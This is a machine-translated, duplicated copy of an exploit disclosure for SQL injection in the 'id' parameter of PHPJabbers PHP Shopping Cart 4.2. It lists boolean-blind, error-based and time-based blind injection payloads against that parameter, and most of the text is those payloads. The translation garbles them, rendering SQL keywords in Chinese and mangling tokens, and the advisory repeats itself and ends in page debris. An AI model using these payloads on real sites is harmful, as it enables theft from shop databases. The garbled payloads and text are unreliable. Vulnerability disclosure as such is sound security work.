## title: php购物车-4.2多塞克利
##作者: nu11secur1ty
## date: 09/13/2023
## Vendor: https://www.phpjabbers.com/
## Software3:https://www.phpjabbers.com/php-shopping-cart-script/#sectionpricing
##参考: https://portswigger.net/web-security/sql-invoction
## Description:
“ ID”参数似乎很容易受到SQL注入攻击的影响。
在ID参数中提交了一个报价,并且数据库错误
消息退还了。然后提交了两个单一引号
错误消息消失了。攻击者很容易偷走
来自此Web应用程序数据库的信息!
警告!所有您的:要小心您购买的东西!这将是您的责任!
[+]有效载荷:
mysql
参数: ID(GET)
Type:基于布尔的盲人
title:或基于布尔的盲人- 在哪里或有子句(不)
payload:控制器=pjfrontaction=pjactiongetstocksid=1')或不
3795=3795-- srcpsession_id=
type:基于错误的
title: mysql=5.6和基于错误的- 在哪里,有,订购或
小组by rable(gtid_subset)
PAYLOAD:控制器=pjfrontaction=pjactiongetStocksid=1')和
gtid_subset(contat(0x71717a6b71,(选择
(ELT(3820=3820,1))),0x7178627871),3820) - kqzasession_id=
Type:基于时间的盲人
title: mysql=5.0.12和基于时间的盲人(查询睡眠)
PAYLOAD:控制器=pjfrontaction=pjactiongetStocksid=1')和
(从(select(sleep(5)))nvya选择2625)-FGLSSSESSION_ID=
##复制:
##证明和Exploit:
系统管理员- 基础设施工程师
穿透测试工程师
nu11secur1ty http://nu11secur1ty.com/
##作者: nu11secur1ty
## date: 09/13/2023
## Vendor: https://www.phpjabbers.com/
## Software3:https://www.phpjabbers.com/php-shopping-cart-script/#sectionpricing
##参考: https://portswigger.net/web-security/sql-invoction
## Description:
“ ID”参数似乎很容易受到SQL注入攻击的影响。
在ID参数中提交了一个报价,并且数据库错误
消息退还了。然后提交了两个单一引号
错误消息消失了。攻击者很容易偷走
来自此Web应用程序数据库的信息!
警告!所有您的:要小心您购买的东西!这将是您的责任!
[+]有效载荷:
mysql
参数: ID(GET)
Type:基于布尔的盲人
title:或基于布尔的盲人- 在哪里或有子句(不)
payload:控制器=pjfrontaction=pjactiongetstocksid=1')或不
3795=3795-- srcpsession_id=
type:基于错误的
title: mysql=5.6和基于错误的- 在哪里,有,订购或
小组by rable(gtid_subset)
PAYLOAD:控制器=pjfrontaction=pjactiongetStocksid=1')和
gtid_subset(contat(0x71717a6b71,(选择
(ELT(3820=3820,1))),0x7178627871),3820) - kqzasession_id=
Type:基于时间的盲人
title: mysql=5.0.12和基于时间的盲人(查询睡眠)
PAYLOAD:控制器=pjfrontaction=pjactiongetStocksid=1')和
(从(select(sleep(5)))nvya选择2625)-FGLSSSESSION_ID=
##复制:
正在加载...
github.com
正在加载...
www.nu11secur1ty.com
穿透测试工程师
nu11secur1ty http://nu11secur1ty.com/